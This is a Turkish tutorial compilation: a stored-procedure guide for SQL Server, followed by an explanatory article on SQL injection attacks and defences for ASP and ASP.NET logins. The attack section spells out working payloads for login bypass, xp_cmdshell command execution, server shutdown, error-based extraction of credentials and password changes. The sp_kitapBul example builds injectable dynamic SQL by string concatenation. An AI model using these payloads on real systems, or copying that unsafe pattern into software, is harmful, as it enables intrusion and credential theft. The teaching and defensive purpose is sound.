Nesneye dayalı programlama bu kadar popüler değilken, programlar sadece prosedür denilen parçacıklardan oluşurdu. Her bir prosedür, belli bir işlevi yerine getimrke için özenle yapılandırılmış program parçacığıdır. Mesela, iki sayı alıp bunların toplamlarını hesaplayan bir kod parçasını toplayıcı adında bir prosedür içerisine paketleyebiliriz. Bir prosedür, başka bir prosedür içerisinden çağrılabilir. Bu da sık kullanılan işlemler için yazılmış kodların bir defa yazılıp çok defa kullanılmasını böylelikle de programlamayı kolyalaştırmayı amaçlar.

Saklı prosedürler, bir çok gelişmiş programlama dilindeki fonksiyon yapılarına karşılık gelir. Birden fazla işlemi, paketlenmiş bir halde bir tek komut ile çalıştırmamız gerektiğinde stored procedures kullanılır. İşlemden kasıt T-SQL ile yapılabilen her şeydir.

Stored procedure, 1980’li yılların sonunda Sybase SQLServer ile birlikte kullanıma girdi. En büyük özelliği sorguların önceden hazırlanması(derlenemesi) ve VTYS ile aynı uzayda çalışmasından dolayı daha hızlı sonuç vermesidir.

Bir SP oluşturulduktan sonra, veritabanı sunucusunda saklanır. Her ihtiyaç duyulduğunda aynı sp defalarca çağrılabilir. Cursor gibi oturum kapandığında silinmez.

Network bazlı çalışmalarda ağ trafiği ve sistem kaynaklarının kullanımın düzenleyerek de performans artışı sağlar. Bir dize işlem, bir tek paket içerisinde yer alır. Gerektiğinde bir tek komut ile tetiklenebilir. Paketin tamamı çalışıncaya kadar istemde bulunan terminale hiçbir şey gönderilmez. Tüm komutlar bittiğinde bir tek sonuç gönderilir. Bu da bazı durumlarda ağ trafiğini rahatlatır.
Bir SP sistem tarafından oluşturulduğu anda şu aşamalara tabi tutulur:

1. SP’nin bileşenleri parçalara ayrıştırılır
2. Veritabanı içerisinde table,view gibi başka nesnelere atıfta bulunan referanslar varsa, geçerli olup olmadıkları kontrol edilir.(Geçerli:1-nesne varmı, 2-izin var mı)
3. Kontrollerden geçen SP’nin adı sysobjects tablosuna, kodları ise syscomments tablosuna saklanır.
4. Bu işlemlerle birlikte derleme işlemi yapılır. Normalizasyon işlemleri olarak da anılan bu işlemler sonucunda, ağaç şeması elde edilir. Bu şema da sysprocedures tablosunda saklanır.
5. SP herhangi bir anda çağrıldığında, ilk kez çalışıyorsa bu işlemler gerçekleştirilir. İlk sefa çağrılmıyorsa, kontrol, sorgulama ağacı oluşturma işlemleri yapılmaz ve oldukça hızlı bir şekilde SP’nin derlenmiş hali çalışır. Bundan dolayı sp’ler derlenen nesnelerden biri olarak anılır.

SP’ler şu faydaları sağlar:

1. Uygulamanın getirdiği bazı iş kuralları prosedür içinde tanımlanabilir. Bir kez oluştuktan sonra bu kurallar birden çok uygulama tarafından kullanılarak daha tutarlı bir veri yönetimi sağlanır. Ayrıca bir fonksiyonelliğin değişmesi ihtiyacı doğduğunda her uygulama için değişiklik yapmak yerine, sadece bir platformda değişiklik yapılır.

2. Tüm prosedürler üstün performansla çalışır ancak birden fazla çalıştırılacak olan prosedürler sorgulama planları procedure cache içinde saklandığından daha da hızlı çalışırlar.
3. Stored Procedure’ ler SQL Server start ettikten sonra otomatik olarak çalıştırılmak üzere ayarlanabilirler.
4. Stored Procedure’ ler harici olarak kullanılırlar. Trigger’ lardan farklı olarak prosedürler uygulama tarafından ya da script tarafından bir şekilde çağrılmak zorundadırlar. Otomatik devreye giremezler.
5. Stored Procedure’ lerın içinde SQL sorgulama diline ek olarak T-SQL komutlarını kullanabiliriz.
6.Kullanıcının bir tabloya erişim izni olmasa bile o tablo üzerinde işlem yapan bir stored procedure’ ü kullanma izni olabilir.

SP oluşturma:

CREATE PROC [ EDURE ] procedure_name [ ; number ]
[ { @parameter data_type }
[ VARYING ] [ = default ] [ OUTPUT ]  ]
[ ,...n ]
Örnek:
Çalıştırıldığı tarih itibariyle, aldığı kitapları getirmeyen üyelerin adını veren bir SP yazalım:

CREATE  PROCEDURE sp_cezaliUye
AS
– Bugünün tarihini al
DECLARE @buGun DATETIME
SET  @buGun = GetDate()

SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @buGun
– bugünden önce gelmesi gereken ödünç işlemlerindeki üye adını seç.

Daha sonra bu SP şu komut ile çağrılır:

EXEC sp_cezaliUye
– sp_cezaliUye stored procedure’ünü çalıştır.

SP üstünde değişiklik yapmak istediğimizde ise,

Sp_helptext sp_adi

Diyerek SP’nin içeriğini görebiliriz.
Daha sonra bu içeriği Query Analyzer kod penceresine yapıştırıp,

ALTER PROCEDURE sp_cezaliUye
AS

DECLARE @buGun DATETIME
SET  @buGun = GetDate()

SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @buGun

Diyerek yeni halini kaydettirebiliriz.

İPUCU:
Bir çok işlemi kod yazmaksızın yapmayı sağlayan Enterprise Manager’i kullanarak sp’leri de kolayca değiştirebilirisiniz. Bunun için Enterprise manager ile bir sp’yi seçip çift tıklamak yeterlidir.

SP’ye parametre yollama:
Bazen SP’ler dışarıdan parametre alabilirler:

Örnek:
Herhangi bir tarih verildiğinde, bu tarihte süresi bittiği halde teslim edilmeyen kitapları bulan bir SP yazalım ancak tarih olarak bu günden daha büyük bir parametre alamasın. Böyle bir durum olduğunda, bu günün tarihini versin.

CREATE  PROCEDURE sp_cezaliUye_1@referansTarih DATETIMEASDECLARE @buGun DATETIME SET @buGun = GetDate()IF @referansTarih > @buGun SET @referansTarih = @buGun — şayet, bugünün tarihi referans tarihten küçük ise,
referans tarihi bugünün tarihi ile değiştir.
SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @referansTarih
– bugün veya daha eski bir tarihte, gelmemiş kitapları alan üyelerin listesini veren sorgu

Bazen dışarıdan gelen parametrelerin isteğe bağlı olması istenebilir.
Bu durumda DEFAULT değer atama seçeneği kullanılır. Şayet dışarıdan parametreye değer atanmazsa, geçerli değer default atanmış değer olarak alınır ve işlem yapılır:

Örnek:
CREATE  PROCEDURE sp_cezaliUye_2
@referansTarih DATETIME = NULL
– dışarıdan referans tarihi gelmedi ise, NULL olarak kabul et.
AS

DECLARE @buGun DATETIME
SET  @buGun = GetDate()

IF (@referansTarih IS NULL) OR (@referansTarih>@buGun)
SET @referansTarih = @buGun
– Referans tarih gelmedi ise veya bugünün tarihinden büyük ise, bugünün tarihini al.

SELECT uyeAdi FROM odunc
WHERE geldiMi=0 AND VermeTarihi + VermeSuresi < @referansTarih
Go

şeklinde yazabiliriz. Daha sonra

EXEC sp_cezaliUye_2 @referansTarih=’01.01.2003’

İle veya

EXEC sp_cezaliUye_2
Diyerek sp’yi çağırabiliriz.

DİKKAT:
SP’de bir parametre için default değer tanımı yaparken, bu değerin sabit bir değer veya NULL olması gerektiğine dikkat etmelidir.

İPUCU:
Bazı durumlarda, SP içerisinde SQL ifadesini bir değişkene atamak suretiyle durumlara göre dinamik olarak meydana getirip, daha sonra da onu çalıştırabiliriz. Bu durumda da EXEC fonksiyonu kullanılır. EXEC fonksiyonu, bir stored procedure batch’in ilk ifadesi değil ise de stored procedure çalıştırılırken kullanılmak zorundadır.

Örnek:

— Yanlış ifade(çalışmaz):
DECLARE @isim VARCHAR(10)
…
sp_cezaliUye_2

– Doğru ifade(çalışır)
DECLARE @isim VARCHAR(10)
….
EXEC sp_cezaliUye_2

Örnek:
Kitaplar tablosu üstünde aşağıdaki parametrelere göre arama yapabilecek bir SP yazalım. Parametrelerden gelenler için filtreleme yapılsın.
Dışarıdan alınabilecek Parametreler: ISBNNo, KitapAdi, Yazari, Ozeti

CREATE  PROCEDURE sp_kitapBul
@ISBNNo CHAR(16) =NULL,
@KitapAdi VARCHAR(55)=NULL,
@kitapYazari VARCHAR(55)=NULL,
@KitapOzeti VARCHAR(55)=NULL
AS

DECLARE @sSQL VARCHAR(500)
– Bir SQL değişkeni tanımlıyoruz
Set @sSQL= ‘SELECT * FROM Kitap WHERE 1=1 ‘
IF @ISBNNo IS NOT NULL
SET @sSQL = @sSQL + ‘  AND ISBNNo = ”’ + @ISBNNo + ””
– ISBNNo parametresi null değilse sorguya ekliyoruz.

IF @KitapAdi IS NOT NULL
SET @sSQL =@sSQL + ‘ AND KitapAdi  LIKE  ”%’  + @KitapAdi +  ‘%”’
– KitapAdi parametresi NULL değil ise sorguya ekliyoruz.

IF @KitapYazari IS NOT NULL
SET @sSQL = @sSQL + ‘ AND KitapYazari  LIKE  ”%’  + @KitapYazari +  ‘%”’
—KitapYazari Null değil ise sorguya ekliyoruz.

IF @KitapOzeti   IS NOT NULL
SET @sSQL = @sSQL + ‘  AND KitapOzeti  LIKE  ”%’  + @KitapOzeti +  ‘%”’
– kitapOzeti null değil ise sorguya ekliyoruz.
print @sSQL –nasıl bir SQL oluşturduğumuzu yazdırıyoruz.

EXEC(@sSQL)
– bir VARCHAR değişkenin içerdiği T-SQL ifadesini çalıştırıyoruz.

Farklı parametre değerleri ile SP’yi çağırabiliriz:

– sadece ISBN vererek çağıralım
EXEC Sp_kitapBul @ISBNNo=’12345’
– ISBN ve KitapAdi parametreleri ile çağırma
EXEC Sp_kitapBul @ISBNNo=’12345’, @kitapAdi=’Yol’

Dünyanin her tarafinda, kullanicilarina; kredi karti numaralari, kullanici bilgileri gibi gizli kalmasi gereken bilgilerin, ürünlere ve siparislere ait verilerin saklandigi uç-arka veri depolariyla hizmet veren web siteleri bulunmaktadir. Ve genel olarak, web sitelerindeki form araciligi ile alinan girdi ile veritabanindaki bilgiler filtrelendikten sonra sonucu kullaniciya gönderen bu tür sistemlerde Yapisal Sorgulama Dili (Structured Query Language – SQL) kullanilmaktadir. Uygulama içerisinde kullanilacak parametre degerleri alinirken kullanilan formun SQL Deyimini yeniden yapilandirabilecek bazi özel karakterlere izin vermesiyle güvenlik problemleri ortaya çikmaktadir.

Bu güvenlik problemleri kullanilarak bir uygulamanin arkasinda, bu uygulamaya destek veren veri tabani üzerindeki bütün bilgilere ulasilabilir veya bilgiler üzerinde degisiklik yapilabilir. Veya veri tabani sisteminin komutlari kullanilarak kullanilan sunucular üzerinde uygulama harici istenen islemler de yapilabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karsi kontrol eden fonksiyonlarin kullanilmali ve genis çapli uygulamalarin bu güvenlik açiklarini tasiyip tasimadigini anlamak için güvenlik denetimine tabi tutulmalidir..

Ilgilendiren Sektör ve Sirketler:

Özel olarak gelistirilmis uygulamalar kullanan tüm kurum ve kuruluslar
Internet / Intranet üzerinde uygulama gelistiren kuruluslar

——————————————————————————–

1. Bir Uygulama Güvenligi Problemi – ‘Yapisal Sorgulama Dili Kullanimi’

Yapisal Sorgulama Dili SQL’in uygulamalarda kullanimina örnek vermek gerekirse;

select Name, Address FROM Users WHERE UserID = ‘2081′

Seklindeki SQL Deyimi ‘Users’ adli tablodan ‘2081′ ürün ID si ile veritabanina kayitli olan kisiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayiflik, kullanilan formun SQL Deyimini yeniden yapilandirabilecek bazi özel karakterlere izin vermesiyle ortaya çikmaktadir. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini saglayan fonksiyonlardir.

Hizla gelisen internet teknolojileri karsisinda yeni pazarda geç olmadan yerini almak isteyen müsterilerine daha kisa sürede daha kullanisli ve ucuz çözümler sunmak zorunda olan uygulama gelistiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadirlar.

Giderek yayginlasan ve medyanin haber potansiyelini olusturan; çalinan kredi karti numaralari, yer alti sitelerde dagitilan müsteri bilgileri, sirket projeleri – yazismalari yaklasan tehlikenin habercisi olmakla beraber halen bu tür kayiplarin yaratabilecegi maddi sonuçlari kavrayamayan ve hala ‘az maliyetle kurtarilan güvenlik projeleri’ ‘yle övünen yöneticilere uyari niteligi tasimaktadir. Öyleki -herzaman bir adim önde olmayi amaçlayan- saldirganlar güvenligin en üst seviyede olmasi beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldirilarina da ara vermeksizin devam etmektedirler.

Maddi ve manevi degere sahip sirketinizi bir anlamda is ortaklarini olan uygulama gelistiricilerin hazirladiklari uygulama ürünlerine emanet edildigini düsünürsek, ‘uygulamalariniza ne kadar güvenirsiniz?’ gibi bir soruya verilecek cevap büyük önem tasimaktadir.

Böyle bir ortamda uygun güvenlik çözümü için ayrilmis bütçe bir lüks degil her an yapilabilecek bir saldirida sirketin ugrayacagi zarari ortadan kaldirmak için alinmasi gereken önlem niteligi tasimaktadir.

2. Örnek Saldirilar – ‘Yapilacak Hamleleri Önceden Tahmin Edebilmek…’

Güvenlikte sikça kullanilan bir deyim; ‘Saldirganlardan korunabilmek için onlar gibi düsünmelisiniz!..’. Saldirganin sisteminize girmek için kullanabilecegi yöntemleri bilmek bu saldirilardan korunabilmek için alinan önlemleri daha saglikli kilacaktir.

Örneklerde kullanacagimiz hedef ; Microsoft® Internet Information Server™’ dan Microsoft® SQL Server™’a varsayilan sistem hesabi’ndan (sa) baglanan ASP tabanli bir kullanici hesabi yöneticisi olacak.
Form.asp : Username ve Password girdisini alan form.Solda…
Login.asp : Veritabani ile baglantiya geçen ve girdinin dogrulugunu kontrol eden ASP kodu.

2.1. Kötü Amaçli (’) Imleçleri Yardimiyla Izinsiz Giris Saglama:

Kullanici ‘Username’ & ‘Password’ verisini Login.asp ye yolladiktan sonra .asp kodunun yapacagi is verilen yoldaki veritabani ile baglanti kurup ilgili tabloda Username ve Password sütünlarinda gönderilen verinin dogrulugunu kontrol etmek olacaktir. Bu islem sonucunda eger sonuç olumluysa kullaniciya; ‘Giris Yapildi’ olumsuzsa; ‘Geçersiz Kullaniciadi & Sifre’ mesaji verilecektir.
Örnekleyecek olursak;

Username : ilkay
Password : 2081

Seklindeki kullanici girdisi asagidaki SQL Deyimini olusturacaktir;

select count(*) FROM Users WHERE Username = ‘ilkay’ AND Password = ‘2081′

Ilk bakista sorun olmayan bir SQL Deyimi… Fakat saldirganin;

Username : ilkay
Password : ‘ OR 1=1–

Seklindeki girdilerle olusturacagi SQL Deyimi ise;

select count(*) FROM Users WHERE Username = ‘ilkay’ AND Password = ” OR 1=1 –’

Olacaktir ki, bu durumda girisin saglanmasi için sart ‘ilkay’ kullanici adina ait sifrenin hiçbirsey* olmasi veya ikinci bir opsiyon olarak 1=1 esitliginin saglanmasidir.

* Hiçbisey = Bosluk

Sonuç : 1=1 esitligi saglandigina göre saldiri basariyla sonuçlanacak ve ‘Giris Yapildi’ mesaji verilecektir.

Not : Microsoft® SQL Server™ ‘–’ imlecinden sonra gelen yersiz kullanilmis tirnak isaretlerini göz ardi edecektir. Ilk bakista basit gibi görünen ve sadece SQL Server’a ait olan bu özellik ilerde örneklerden de anlasilacagi üzere saldirgana büyük kolaylik saglayacaktir..

2.2. Uzaktan Çalistirilmasi Mümkün Olan Prosedürler:

MS SQL Server’a varsayilan sistem hesabindan yaptigimiz baglanti SQL Enjeksiyon saldirisinda muhtemel saldirgana sunucuda saklanan prosedürleri çalistirabilmesi için gerekli haklari taniyacaktir. Saldirganin kullanabilecegi prosedürlerden bir tanesi; ‘master..xp_cmdshell’ olabilir.

Username : ilkay
Password : ‘; EXEC master..xp_cmdshell ‘dir c:’–

Girdileriyle olusacak SQL Deyimi;

select count(*) FROM Users WHERE Username = ‘ilkay’ AND Password = ”; EXEC master..xp_cmdshell ‘dir c:’–’

Sonuç : SQL Server Kullaniciadi ve Sifreyi bulunduran sütunlari arayacaktir bulamadigi için ‘Yanlis Kullaniciadi & Sifre’ mesajini verecektir fakat bu arada arka planda ‘dir c:’ komutunu çalistiracak ve saldirgan C sürücüsünün içerigine ulasacaktir.

2.3. SQL Server Hedef Alinarak Yapilan Saldirilar:

Yönetici haklarina sahip saldirgan silme,ekleme,degistirme…vb gibi komutlari rahatlikla çalistirabilecektir.

SHUTDOWN WITH NOWAIT SQL Server’in kritik komutlarindan bir tanesidir. Komutla beraber SQL Server görevine son verir.

Username : ‘; SHUTDOWN WITH NOWAIT–
Password : [Bos]

Bu girdilerle olusturulan SQL Deyimi;

select Username FROM Users WHERE Username=”; SHUTDOWN WITH NOWAIT; –’ AND Password=”

Sonuç : SQL Server kullaniciadinin bulunamadigi mesajini verecektir. Fakat bununla beraber arka planda diger komutu çalistirdigi için SQL Server kapanacaktir.

2.4. ODBC Hatalarindan Faydalanarak Yapilan Saldirilar:

SQL Server’in verdigi hatalardan faydalanarak veritabanindaki neredeyse tüm bilgilere ulasmak mümkündür.

Hedef; http://Victim/Default.asp?id=10 seklinde ürün ID leri ile çalisan ASP tabanli bir websitesi.

Saldiri SQL Server’in integer ve string cinsinden verileri birlikte gönderememesinden faydalinarak yapilabilir;

Gönderilen ‘10′ sayisina veritabanindan herhangi bir string eklenir.

http://Victim/Default.asp?id=10 UNION select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

Not: ‘INFORMATION_SCHEMA.TABLES’ sistem tablosu, sistemde bulunan diger tüm tablolar hakkinda bilgi içerir. Deyimde kullanilan ‘TABLE_NAME’ de yine tüm tablo isimlerini içerir.

Olusacak SQL Deyimi;

select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

String -> Integer dönüsümünü yapamayan SQL Server asagidaki hatayi verecektir.

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘Table1′ to a column of data type int.
/Default.asp, line 5

Hata, saldirgana ‘Table1′ olarak buldugu cevabi integer a çeviremedigini (dolayisiyla veritabanindaki ilk tablo adinin ‘Table1′ oldugunu) belirtmektedir. Saldirgan diger tablolarin adini asagidaki sekilde ögrenebilir…

http://Victim/Default.asp?id=10 UNION select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’Table1′)–

Veya dogrudan LIKE komutunu kullanarak aradigi seye daha kolay yoldan ulasabilir;

http://Victim/Default.asp?id=10 UNION select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%/%25Login%/%25′–

SQL Server’in verecegi hata;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘Admin_Login’ to a column of data type int.
/Default.asp, line 5

Admin_Login adinda bir tablo oldugunu ögrenen saldirgan muhtemelen tablodaki ilk kullaniciadi ve sifreye ulasmak isteyecektir. Izleyebilecegi yol ise;

http://Victim/Default.asp?id=10 UNION select TOP 1 Username FROM Admin_Login–

Hata;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ilkay’ to a column of data type int.
/Default.asp, line 5

Bu sekilde ‘admin’ kullaniciadinin varligini dogrulayan saldirganin sifreyi ele geçirmek için kullanacagi girdi;

http://Victim/Default.asp?id=10 UNION select TOP 1 Password FROM Admin_Login WHERE Username=’ilkay’–

Hata;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘2081′ to a column of data type int.
/Default.asp, line 5

Sonuç :
Username : ilkay
Password : 2081

2.5. Veritabanina Ekleme Yapma veya Veri Düzenleme:

Kullaniciadi ve sifre bilgisine ulasan muhtemel saldirgan benzer yöntemleri ve UPDATE,insert komutlarini kullanarak sifreyi degistirebilir veya daha temizi baska bir kullanici hesabi açabilir…

http://Victim/Default.asp?id=10; UPDATE ‘Admin_Login’ SET ‘Password’ = ‘NewPwd’ WHERE Username=’ilkay’–

Yeni bir kullanici hesabi için;

http://Victim/Default.asp?id=10; insert INTO ‘Admin_Login’ (’UserID’, ‘Username’, ‘Password’, ‘Details’) VALUES (666,’Desperate_Cry’,'2081′,’N /A’)–

3. Nasil Korunmali? – ‘Aksi Dogrulanincaya Kadar Tüm Kullanici Girdileri Kötüdür…’

Gelebilecek SQL Enjeksiyon saldirilarindan korunabilmek için alinan önlemlerde temel alinmasi geren nokta… ‘Aksi dogrulanincaya kadar tüm kullanici girdileri kötüdür!’.

3.1. Kullanici Haklarinin Sinirlandirilmasi

Yaygin olarak yapilan hata; Web Server dan SQL Server a yapilan baglantilarda varsayilan sistem hesabi kullanilmasi… Bu sekilde yönetici haklarina sahip olan saldirgan örneklerde de görülebilecegi üzere istegi komutu çalistirip istedigi ekleme,silme,düzeltme eylemini gerçeklestirebilecektir. Bunu yerine yapilmasi gereken yeni bir kullanici hesabi olusturup kullanicinin çalistirabilecegi komutlari sinirlandirmak olacaktir.

Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasindan siparis verilmesine izin verecekseniz, ‘web_user’ gibi bir kullanici adi olusturup ürünleri incelemek için; ürünler sütununda sadece ’select’ kullanimina ve siparisleri için; siparisler sütununda sadece ‘insert’ kullanimina izin vermeniz uygun olacaktir.

3.2. Girdilerde Tirnak Imleçlerinin (’) Kötü Amaçli Kullaniminin Engellenmesi

Yaygin SQL Enjeksiyon saldirilari SQL deyimlerinin girdilerdeki gereksiz (’) tirnak isaretleri yardimiyla yeniden olusturulmasi sayesinde yapilir.

Küçük bir filtreleme fonksiyonu veya tek tirnagi çift tirnaga çeviren bir fonksiyon muhtemel bir saldiriyi engellmek için yeterli olabilir.

ASP Kullanarak girdileri kontrol ederek degistiren bir fonksiyon kolaylikla yazilabilir;

Bu fonksiyonu bastaki örnekte kullanirsak;

select count(*) FROM Users WHERE Username=’ilkay’ AND Password=” OR 1=1 –’

seklinde olan deyim…

select count(*) FROM Users WHERE Username=’ilkay’ AND Password=” OR 1=1 –’

‘e dönüsecektir.

3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi

SQL Enjeksiyon saldirilari genelde ‘;, –,select, insert ve xp_’ gibi karakterlerin-kelimelerin kullanilmasiyla yapildigi için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayifligi engelleyebilir.Örnegin kullanicidan E – Mail adresini girmesi isteniyorsa harfler ve sayilarin yaninda sadece ‘ @,-,_,.’ karakterlerinin kullanilmasina izin verilmelidir.

Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanli DLL ler, kullanici tarafli fonksiyonlar…vb, izole edilmis bir sunucuya tasinmalidir. Bazi zararli kelime-harfleri filteleyen ASP fonksiyonu asagida örneklenmistir;

Tirnak degistirme fonksiyonu ve filtreleme fonksiyonu beraber kullanilirsa;

select Username FROM Users WHERE Usename=”; EXEC master..xp_cmdshell ‘dir c’; –’ AND Password=”

Seklindeki SQL Deyimi…

select Username FROM Users WHERE Usename=” EXEC master.. cmdshell ‘dir c:’ ‘ AND Password=”

e dönüsecektir ki bu da herhangi bir kayit bulumadigi hatasini vermekten öteye gitmeyecektir.

Bu fonksiyonu kullanicidan gelen bütün girdilere, adres satiri ifadelerine ve çerezlerden gelen tüm veriye uygulamamiz gelebilecek saldirinin önüne geçecektir.

3.4. Girdi Uzunlugunun Sinirlandirilmasi

Veritabanindaki ayrilan alanin uzunlugu 10 karakterlikse, formunuzda bu alan için 50 karakter sigan bir text kutusuna sahip olmaniz sakincali olabilir. Ve mümkün oldugu kadar girdi uzunluklarini kisa tutmak muhtemel saldiriyi engellemek için önlem sayilabilir.

3.5. Girdi Cinsinin Kontrol Edilmesi

Formunuzdan girilen verinin istediginiz türden bir veri olup olmadigini kontrol eden bir fonksiyon kötü amaçli kullanimlarda saldirganin kullanabilecegi harf/sayi seçenegini kisitlayacaktir. Mesela, eger Ürün ID si için formunuzdan girdi aliyorsaniz girdinin sayisal bir ifade olup olmadigini kontrol eden bir fonksiyon fayda saglayacaktir.

3.6. Girdi Cinsinin Kontrol Edilmesi

Formunuz araciligi ile topladiginiz verileri yollarken mutlaka ‘POST’ metodunu kullanin ki kullanicilariniz adres çubugunda girdikleri verilerle beraber form degerlerini gördüklerinde akillarina farkli fikirler gelmesin.

4. Son Söz – ‘Herzaman bir adim önde!’

Aldiginiz güvenlik önlemleri veya (en iyi ihtimalle) yazip da kullanmayi bir aliskanlik haline getiremediginiz güvenlik politikalari sizi güvenlik problemlerine karsi koruyabilir mi? Eger güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almiyorsaniz hiçbir güvenlik ürünü, bir güvenlik kaybina ugramanizi engelleyemez.

Bilgi sistemleri altyapinizi tasidiklari güvenlik zaaflarina karsi düzenli olarak kontrol ettirmek, risklerinizi takip etmek, dogru teknolojiyi dogru yerde ve dogru sekilde kullanmanizi saglayacak güvenlik politikalarinizi olusturup güvenlik probleminizi sürekli yönetebilecek olgunluga ulasmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kismini olusturan uygulamalarin tasiyabilecegi güvenlik sorunlari uzun süredir ihmal edilmelerinden dolayi, günümüzün en popüler sistem sizma noktalarini teskil etmektedirler. Bu nedenle uygulama güvenligine iliskin gereken önemi vermeniz, güvenlik denetimi yaptirmaniz ve kurumunuzun bilgi güvenligi yönetim sistemini olusturmaya bir yerinden baslamanizi öneriyorum…

Şimdi sıra geldi web uygulamalarınızı nasıl yazmanız ve yazmamanız gerektiğine.
login.aspx sayfamızda yer alan Button’un OnClick olayına şu şekilde kod yazılmış olduğunu farzedelim.

Eğer kullanıcı kendi kullanıcı adı ve şifresini girerse her şey normal şekilde sürer. Fakat eğer iyi yazılmamış bir login sayfasında aşağıdaki gibi bir ifade girilirse ne olur görelim.

‘or 1=1–

şeklinde bir Sql ifadesi kullanıcı adının girileceği TextBox’a girilir ve şifre kısmına da rastgele bir değer girilirse, veritabanımızdaki tabloda böyle bir kullanıcı olmasa bile yetkilendirme işlemi başarılı olacaktır. Çünkü ‘or 1=1– ifadesinin TextBox’a girilmesi sonucu sorgu ifadesi şu şekle dönüşmüş olur.

Select * From users Where username = ‘ ‘or 1=1–’ AND password = ‘”+ txtpassword.Text +”‘

Kullanıcı adını yazdığımız TextBox nesnesine girilen ‘or 1=1– ifadesinde yer alan — işaretlerinin anlamı; — işaretlerinden gelen sonraki ifadeleri yoksay olacaktır. Yani sonuç olarak ifademiz;

Select * From users Where username = ‘ ‘or 1=1–

şekline dönüşecektir.Bu ifadede yer alan or 1=1 ifadesi sürekli doğru sonucu vereceğinden sonuç olarak sorgu işlemi bir kayıt döndürecektir. Bizim if döngümüzde yer alan dr.Read() ifadesi de true değerini alacağından if deyimi çalıştırılacak ve kullanıcı Authenticate işlemini başarı ile geçecektir.

Peki bu Sql Injection saldırısının çalışmasını sağlayan hatalar neydi? Kodumuzu satır satır inceleyelim.

string strCnx = ConfigurationSettings.AppSettings["BadconnStr"];
SqlConnection conn = new SqlConnection(strCnx);

bu ifadede BadconnStr değerini Web.config sayfamızdan almaktayız. Web.config sayfamızda yer alan ConnectionString ifademiz şu şekildedir.

Bu ConnectionString ifadesindeki hata veritabanına sa olarak bağlanmamızdır. Hiçbir zaman veritabanına sa kullanıcısı olarak bağlanmayın. Çünkü sa veritabanı üzerinde çok yüksek haklara sahiptir. Oysa bize gerekli olan sadece SELECT sorgusu.

Diğer bir hata ise sorgu işleminin dinamik olarak yapılması. Eğer bu şekilde dinamik olarak SQL sorguları yaratılırsa yukarıda girilen ‘or 1=1– ifadesinin girilmesi ile çok büyük güvenlik açıklarına neden olursunuz. Peki ne yapacağız. Yukarıda bahsettiğim prensiplere göre parametre olarak veri göndermeli veya Stored Procedure kullanmalıyız.

Aslında yukarıda TextBox’lara girilen değerleri de kontrol etmemiz gerekir. Yine aynı şekilde TextBox’ın MaxLength özelliğinin mutlaka kısıtlanması gerekir. Yani TextBox’lara sınırsız karakter girilmesini önlemeliyiz. TextBox’lara girilebilecek özel karakterleri de kontrol etmeliyiz. Yani ‘ ” – + # % & gibi bir çok karakterlerin girilmemesini sağlamalıyız.

Sadece ‘or 1=1– ifadesinden farklı Sql Injection saldırıları da olabilir. Örneğin yine kullanıcı adını girdiğimiz TextBox nesnesinin içine,

‘; UPDATE users SET password = ‘deneme’ WHERE username = ‘mehmet’ —

ifadesi de girilebilir. Peki bu Sql Injection ne gibi zararlara neden olur?

Bu ifade ile çoklu Sql deyimleri noktalı virgül yardımı ile aynı anda çalıştırılabilir. Bu ifade ile users tablosunda yer alan kullanıcı adı mehmet olan kişinin şifresini deneme olarak değiştiriyor. Eğer yukarıdaki gibi kötü yazılmış bir kod varsa bu işlem başarı ile gerçekleştiriliyor. Yine aynı şekilde buna benzer bir ifade ile, veritabanında yeni kullanıcılar yaratılabilr, bir tablo silinebilir, veya herhangi bir stored procedure yazılarak çok farklı işlemler gerçekleştirilebilir. Bunu önlemenin yolu veritabanına bağlantı yaptığımız ConnectionString’inde yer alan user’a sadece ve sadece gerekli izinler verilmelidir. Örneğin, burada user’ın sadece SELECT ifadesi için izin verilseydi hiç bir sorun olmayacaktı.

Şimdi daha güvenli login işleminin nasıl gerçekleşeceğini görelim.

Daha Güvenli Login Sayfamız

Öncelikle sayfamızın tasarım kısmının neye benzediğine bakalım. Daha iyi görebilmek için şeklin üzerine tıklayıp büyütebilirsiniz

LOGIN Butonuna tıkladığımızda çalışacak kodu görmeden önce Web.config dosyasında yer alan ConnectionString ifadesini görelim.

Button’umuzun OnClick olayında çalışacak kod ise şu şekildedir.

